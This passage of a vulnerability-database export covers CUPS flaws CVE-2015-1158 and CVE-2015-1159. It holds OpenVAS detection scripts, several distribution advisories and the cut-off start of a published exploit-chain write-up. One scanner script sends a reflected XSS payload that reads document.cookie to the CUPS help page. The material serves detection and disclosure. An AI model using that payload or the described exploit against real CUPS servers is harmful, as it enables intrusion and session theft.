useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869513\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-07 06:21:21 +0200 (Tue, 07 Jul 2015)\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for cups FEDORA-2015-9726\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'cups'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"cups on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-9726\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160444.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"cups\", rpm:\"cups~2.0.3~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.", "modified": "2019-03-18T00:00:00", "published": "2015-06-09T00:00:00", "id": "OPENVAS:1361412562310703283", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703283", "type": "openvas", "title": "Debian Security Advisory DSA 3283-1 (cups - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3283.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3283-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703283\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_name(\"Debian Security Advisory DSA 3283-1 (cups - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 00:00:00 +0200 (Tue, 09 Jun 2015)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3283.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"cups on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy),\nthese problems have been fixed in version 1.5.3-5+deb7u6.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.7.5-11+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.7.5-12.\n\nWe recommend that you upgrade your cups packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that CUPS, the\nCommon UNIX Printing System, is vulnerable to a remotely triggerable privilege\nescalation via cross-site scripting and bad print job submission used to replace\ncupsd.conf on the CUPS server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"cups\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-bsd\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-client\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-common\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-dbg\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cups-ppdc\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"cupsddk\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcups2-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupscgi1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsdriver1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsdriver1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsdriver1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsimage2-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsmime1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1:amd64\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1:i386\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcupsppdc1-dev\", ver:\"1.5.3-5+deb7u6\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-12T17:25:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.", "modified": "2020-05-08T00:00:00", "published": "2015-06-15T00:00:00", "id": "OPENVAS:1361412562310105298", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105298", "type": "openvas", "title": "CUPS < 2.0.3 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CUPS < 2.0.3 Multiple Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:cups\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105298\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-05-08T08:34:44+0000\");\n\n script_name(\"CUPS < 2.0.3 Multiple Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/810572\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/37336\");\n\n script_tag(name:\"impact\", value:\"CVE-2015-1158 may allow a remote unauthenticated\nattacker access to privileged operations on the CUPS server. CVE-2015-1159 may allow\nan attacker to execute arbitrary javascript in a user's browser.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP GET request\nand check whether it is able to read cookie or not\");\n\n script_tag(name:\"insight\", value:\"CVE-2015-1158:\nAn issue with how localized strings are handled in cupsd allows a reference\ncounter to over-decrement when handling certain print job request errors. As a\nresult, an attacker can prematurely free an arbitrary string of global scope,\ncreating a dangling pointer to a repurposed block of memory on the heap. The\ndangling pointer causes ACL verification to fail when parsing 'admin/conf' and\n'admin' ACLs. The ACL handling failure results in unrestricted access to\nprivileged operations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\nCVE-2015-1159:\nA cross-site scripting bug in the CUPS templating engine allows this bug to be\nexploited when a user browses the web. In certain cases, the CGI template can\necho user input to file rather than escaping the text first. This may be used\nto set up a reflected XSS attack in the QUERY parameter of the web interface\nhelp page. By default, many linux distributions run with the web interface\nactivated, OS X has the web interface deactivated by default.\");\n\n script_tag(name:\"solution\", value:\"A patch addressing these issues has been\nreleased for all supported versions of CUPS. For the version 2.0 branch (the latest\nrelease), 2.0.3 contains the patch.\");\n\n script_tag(name:\"summary\", value:\"Various versions of CUPS are vulnerable\nto a privilege escalation due to a memory management error.\");\n\n script_tag(name:\"affected\", value:\"CUPS < 2.0.3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-06-15 15:24:12 +0200 (Mon, 15 Jun 2015)\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_cups_detect.nasl\");\n script_require_ports(\"Services/www\", 631);\n script_mandatory_keys(\"CUPS/installed\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nif(!cupsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nurl = \"/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28document.cooki\" +\n \"e%29%3C/script%3E%3C!--&SEARCH=Search\";\n\nif(http_vuln_check(port:cupsPort, url:url, pattern:\"script>alert\$document.cookie\$</script>\",\n extra_check: make_list(\">Online Help\", \"CUPS\"), check_header:TRUE))\n{\n report = http_report_vuln_url( port:cupsPort, url:url );\n security_message(port:cupsPort, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Gentoo Linux Local Security Checks GLSA 201510-07", "modified": "2018-10-26T00:00:00", "published": "2015-11-08T00:00:00", "id": "OPENVAS:1361412562310121420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121420", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201510-07", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201510-07.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121420\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-08 13:04:39 +0200 (Sun, 08 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201510-07\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in cups. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201510-07\");\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201510-07\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-print/cups\", unaffected: make_list(\"ge 2.0.3\"), vulnerable: make_list(\"lt 2.0.3\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "- CVE-2015-1158 (arbitrary code execution, privilege escalation)\n\nAn issue with how localized strings are handled in cupsd allows a\nreference counter to over-decrement when handling certain print job\nrequest errors. As a result, an attacker can prematurely free an\narbitrary string of global scope, creating a dangling pointer to a\nrepurposed block of memory on the heap. The dangling pointer causes ACL\nverification to fail when parsing 'admin/conf' and 'admin' ACLs. The ACL\nhandling failure results in unrestricted access to privileged\noperations, allowing an unauthenticated remote user to upload a\nreplacement CUPS configuration file and mount further attacks.\n\n- CVE-2015-1159 (cross-side scripting)\n\nA cross-site scripting bug in the CUPS templating engine allows this bug\nto be exploited when a user browses the web. In certain cases, the CGI\ntemplate can echo user input to file rather than escaping the text\nfirst. This may be used to set up a reflected XSS attack in the QUERY\nparameter of the web interface help page. By default, many linux\ndistributions run with the web interface activated.", "modified": "2015-06-10T00:00:00", "published": "2015-06-10T00:00:00", "id": "ASA-201506-2", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-June/000343.html", "type": "archlinux", "title": "cups: multiple issues", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:59", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2629-1\r\nJune 10, 2015\r\n\r\ncups vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.04\r\n- Ubuntu 14.10\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in CUPS.\r\n\r\nSoftware Description:\r\n- cups: Common UNIX Printing System(tm)\r\n\r\nDetails:\r\n\r\nIt was discovered that CUPS incorrectly handled reference counting when\r\nhandling localized strings. A remote attacker could use this issue to\r\nescalate permissions, upload a replacement CUPS configuration file, and\r\nexecute arbitrary code. (CVE-2015-1158)\r\n\r\nIt was discovered that the CUPS templating engine contained a cross-site\r\nscripting issue. A remote attacker could use this issue to bypass default\r\nconfiguration settings. (CVE-2015-1159)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.04:\r\n cups 2.0.2-1ubuntu3.1\r\n\r\nUbuntu 14.10:\r\n cups 1.7.5-3ubuntu3.2\r\n\r\nUbuntu 14.04 LTS:\r\n cups 1.7.2-0ubuntu1.6\r\n\r\nUbuntu 12.04 LTS:\r\n cups 1.5.3-0ubuntu8.7\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2629-1\r\n CVE-2015-1158, CVE-2015-1159\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/cups/2.0.2-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/cups/1.7.5-3ubuntu3.2\r\n https://launchpad.net/ubuntu/+source/cups/1.7.2-0ubuntu1.6\r\n https://launchpad.net/ubuntu/+source/cups/1.5.3-0ubuntu8.7\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:DOC:32208", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32208", "title": "[USN-2629-1] CUPS vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "Code execution, crossite scripting.", "edition": 1, "modified": "2015-06-14T00:00:00", "published": "2015-06-14T00:00:00", "id": "SECURITYVULNS:VULN:14537", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14537", "title": "CUPS security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:57", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA256\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3172-1 security@debian.org\r\nhttp://www.debian.org/security/ Sebastien Delafond\r\nFebruary 25, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : cups\r\nCVE ID : CVE-2014-9679\r\nDebian Bug : 778387\r\n\r\nPeter De Wachter discovered that CUPS, the Common UNIX Printing\r\nSystem, did not correctly parse compressed raster files. By submitting\r\na specially crafted raster file, a remote attacker could use this\r\nvulnerability to trigger a buffer overflow.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 1.5.3-5+deb7u5.\r\n\r\nFor the upcoming stable distribution (jessie) and unstable\r\ndistribution (sid), this problem has been fixed in version 1.7.5-11.\r\n\r\nWe recommend that you upgrade your cups packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: https://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2\r\n\r\niQEcBAEBCAAGBQJU7aoLAAoJEBC+iYPz1Z1kU2YH/3NDe8zgtSe16sgOYxRCnIA5\r\n8JzBeGywAW2g9+hRvTYX3N6s9XwnDddkIhM9XcBF2t2u/w7zEHfMtrwI1AiUF6rR\r\n34lNihMhDnlTSnPhYVtb/aKFJbMd7iZFgm+ctwm1n4G1pVID78dbL2BxhrQCsMLJ\r\niLoffeDcCbyzPp0MZSGhpbrXzTUTCOXxeBTMN34ONcShJ0NBiEkQGCyj4AyUpb1h\r\nKo/v28cmPLT6jFY8Avx7rYMo8YNPP6HcF/i9w/gC+A//tzVx6qb4WxXDKDYs5VNW\r\n3yFL6DHrKPdYTgzQk/K9Hq/fqdJTBKDZ13sWJVwsV6GuCUAUFgl0OxALSFGN8Lo=\r\n=EW8H\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:DOC:31770", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31770", "title": "[SECURITY] [DSA 3172-1] cups security update", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:59", "bulletinFamily": "software", "cvelist": ["CVE-2014-9679"], "description": "Integer overflow on compressed raster files parsing.", "edition": 1, "modified": "2015-03-07T00:00:00", "published": "2015-03-07T00:00:00", "id": "SECURITYVULNS:VULN:14295", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14295", "title": "CUPS integer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nMultiple vulnerabilities have been discovered in cups. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.3\"", "edition": 1, "modified": "2015-10-31T00:00:00", "published": "2015-10-31T00:00:00", "id": "GLSA-201510-07", "href": "https://security.gentoo.org/glsa/201510-07", "type": "gentoo", "title": "CUPS: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9679"], "edition": 1, "description": "### Background\n\nCUPS, the Common Unix Printing System, is a full-featured print server.\n\n### Description\n\nA vulnerability has been discovered in CUPS concerning the handling of compressed raster files. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll CUPS users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-print/cups-2.0.2-r1\"", "modified": "2016-07-16T00:00:00", "published": "2016-07-16T00:00:00", "id": "GLSA-201607-06", "href": "https://security.gentoo.org/glsa/201607-06", "type": "gentoo", "title": "CUPS: Buffer overflow", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:53", "description": "", "published": "2015-06-22T00:00:00", "type": "packetstorm", "title": "CUPS XSS / String Handling / Improper Teardown", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "id": "PACKETSTORM:132389", "href": "https://packetstormsecurity.com/files/132389/CUPS-XSS-String-Handling-Improper-Teardown.html", "sourceData": "`Source: http://googleprojectzero.blogspot.se/2015/06/owning-internet-printing-case-study-in.html \n \nAbstract \n \nModern exploit mitigations draw attackers into a game of diminishing marginal returns. With each additional mitigation added, a subset of software bugs become unexploitable, and others become difficult to exploit, requiring application or even bug-specific knowledge that cannot be reused. The practical effect of exploit mitigations against any given bug or class of bugs is the subject of great debate amongst security researchers. \n \nDespite mitigations, skilled and determined attackers alike remain undeterred. They cope by finding more bugs, and by crafting increasingly complex exploit chains. Attackers treat these exploits as closely-guarded, increasingly valuable secrets, and it's rare to see publicly-available full-fledged exploit chains. This visibility problem contributes to an attacker's advantage in the short term, but hinders broader innovation. \n \nIn this blog post, I describe an exploit chain for several bugs I discovered in CUPS, an open-source printing suite. I start by analyzing a relatively-subtle bug in CUPS string handling (CVE-2015-1158), an exploit primitive. I discuss key design and implementation choices that contributed to this bug. I then discuss how to build an exploit using the primitive. Next, I describe a second implementation error (CVE-2015-1159) that compounds the effect of the first, exposing otherwise unreachable instances of CUPS. Finally, I discuss the specific features and configuration options of CUPS that either helped or hindered exploitation. \n \nBy publishing this analysis, I hope to encourage transparent discourse on the state of exploits and mitigations, and inspire other researchers to do the same. \n \nSummary \n \nCupsd uses reference-counted strings with global scope. When parsing a print job request, cupsd can be forced to over-decrement the reference count for a string from the request. As a result, an attacker can prematurely free an arbitrary string of global scope. I use this to dismantle ACL's protecting privileged operations, upload a replacement configuration file, then run arbitrary code. \n \nThe reference count over-decrement is exploitable in default configurations, and does not require any special permissions other than the basic ability to print. A cross-site scripting bug in the CUPS templating engine allows this bug to be exploited when a user browses the web. The XSS is reachable in the default configuration for Linux instances of CUPS, and allows an attacker to bypass default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. \n \nExploitation is near-deterministic, and does not require complex memory-corruption 'acrobatics'. Reliability is not affected by traditional exploit 